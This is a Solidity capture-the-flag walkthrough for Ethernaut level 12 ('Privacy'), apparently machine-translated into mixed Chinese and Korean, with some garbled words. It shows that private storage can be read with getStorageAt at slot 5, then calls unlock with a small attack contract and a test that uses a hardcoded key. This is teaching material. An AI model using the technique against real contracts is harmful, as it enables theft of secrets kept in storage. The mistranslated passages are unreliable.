Ethernaut系列-레벨 12(프라이버시)
레벨 12(프라이버시):
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
contract Privacy {
bool public locked = true;
uint256 public ID = block.timestamp;
uint8 private flattening = 10;
uint8 private denomination = 255;
uint16 private awkwardness = uint16(now);
bytes32[3] private data;
constructor(bytes32[3] memory _data) public {
data = _data;
}
function unlock(bytes16 _key) public {
require(_key == bytes16(data[2]));
locked = false;
}
/*
A bunch of super advanced solidity algorithms...
,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`
.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,
*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^ ,---/V\
`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*. ~|__(o.o)
^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*' UU UU
*/
}
通关要求
잠김=거짓
要点
1. 合约的 storage都是可见的,包含private
2.了解合约storage是如何存储
설명:
https://docs.soliditylang.org/en/v0.8.14/internals/layout_in_storage.html
解题思路
1.计算data[2]在哪个슬롯
bool public locked = true;
uint256 public ID = block.timestamp;
uint8 private flattening = 10;
uint8 private denomination = 255;
uint16 private awkwardness = uint16(now);
bytes32[3] private data;
1个slot×bytes32,고
슬롯:잠김 = 슬롯:0
슬롯:ID = 슬롯:1
슬롯:평평화/종목/어색함(三个刚好32位,压缩成一个slot) = 슬롯:2
슬롯:데이터[0] = 슬롯:3
슬롯:데이터[1] = 슬롯:4
슬롯:데이터[2] = 슬롯:5
2. await web3.eth.getStorageAt(instance,5)를 사용하여 키 실행
터놓다()
如:
계약/12PrivacyRun.sol
function run(address _levelAddress,bytes32 _key) external {
ILevel(_levelAddress).unlock(bytes16(_key));
}
테스트/12Privacy.js
it("attacks", async function () {
await runContract
.connect(player)
.run(
levelContract.address,
"0x1d9da787827b4d4aea38011b26b92fd0928e8cd736a86d8b9c5348f782dbe3a5"
);
});
Reference
이 문제에 관하여(Ethernaut系列-레벨 12(프라이버시)), 우리는 이곳에서 더 많은 자료를 발견하고 링크를 클릭하여 보았다 https://dev.to/bin2chen/ethernautxi-lie-level-12privacy-3nde텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
우수한 개발자 콘텐츠 발견에 전념
(Collection and Share based on the CC Protocol.)
좋은 웹페이지 즐겨찾기
